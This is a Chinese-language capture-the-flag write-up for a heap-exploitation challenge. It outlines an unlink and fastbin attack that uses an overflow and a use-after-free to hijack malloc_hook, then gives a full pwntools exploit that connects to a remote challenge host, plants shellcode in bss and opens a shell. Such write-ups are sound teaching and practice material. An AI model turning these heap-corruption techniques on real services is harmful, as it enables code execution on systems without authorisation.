程序有add,edit,free没有show,pie未开,bss可写执行,有写溢出漏洞和UAF漏洞,unlink+fastbin attack,无需泄露地址。
解题思路:
- 先建0x28,0x80,0x10块,利用写溢出在释放1块时进行unlink控制指针区;
- 由于free时不清指针,且仅允许建9块,在控制指针区后清指针,保留控制指针的指针;并预留shellcode
- 建0x10,0x60,0x10在原unsort位置,释放0x60块后通过写溢出修改0x60的头为0x91再释放在0x60的fd位置得到main_arena的指针;
- 将指针尾字节改为0x05(利用针位在malloc_hook前指0x7f);
- 建0x60的块两次将块建到malloc_hook附近;
- 通过将malloc_hook附近的指针尾字节改为0x10,控制malloc_hook写入指向shellcode的指针;
- 再建块时调用shellcode得到shell
完整exp:
from pwn import *
local = 0
if local == 1:
p = process('./pwn')
else:
p = remote('111.200.241.244', 57362)
libc_elf = ELF('/home/shi/buuctf/buuoj_2.23_amd64/libc6_2.23-0ubuntu10_amd64.so')
one = [0x45216, 0x4526a, 0xf02a4, 0xf1147 ]
libc_start_main_ret = 0x20830
elf = ELF('./pwn')
context.arch = 'amd64'
context.log_level = 'debug'
menu = b"Your choice :"
def add(size, msg):
p.sendlineafter(menu, b'1')
p.sendlineafter(b"Size: ", str(size).encode())
p.sendafter(b"Data: ", msg)
def free(idx):
p.sendlineafter(menu, b'2')
p.sendlineafter(b"Index: ", str(idx).encode())
def edit(idx, msg):
p.sendlineafter(menu, b'3')
p.sendlineafter(b"Index: ", str(idx).encode())
p.sendlineafter(b"Size: ", str(len(msg)).encode())
p.sendafter(b"Data: ", msg)
add(0x28, b'A')
add(0x80, b'A')
add(0x10, b'A')
add(0x10, b'A')
add(0x10, b'A')
buf = 0x601040
edit(0, flat(0,0x21, buf-0x18, buf-0x10, 0x20, 0x90))
free(1)
edit(0, p64(0)*3+p64(buf+8)+p64(0)*9+ asm(shellcraft.sh()))
add(0x10, b'1')
add(0x60, b'2')
add(0x10, b'3')
free(2)
edit(1, b'A'*0x18+p8(0x91))
free(2)
edit(1, b'A'*0x18+p64(0x71)+b'\x05')
add(0x68, b'4')
add(0x68, b'A')
edit(0, p64(0)*4+p8(0x10))
edit(5, p64(buf+0x50))
p.sendlineafter(menu, b'1')
p.sendlineafter(b"Size: ", b'1')
p.interactive()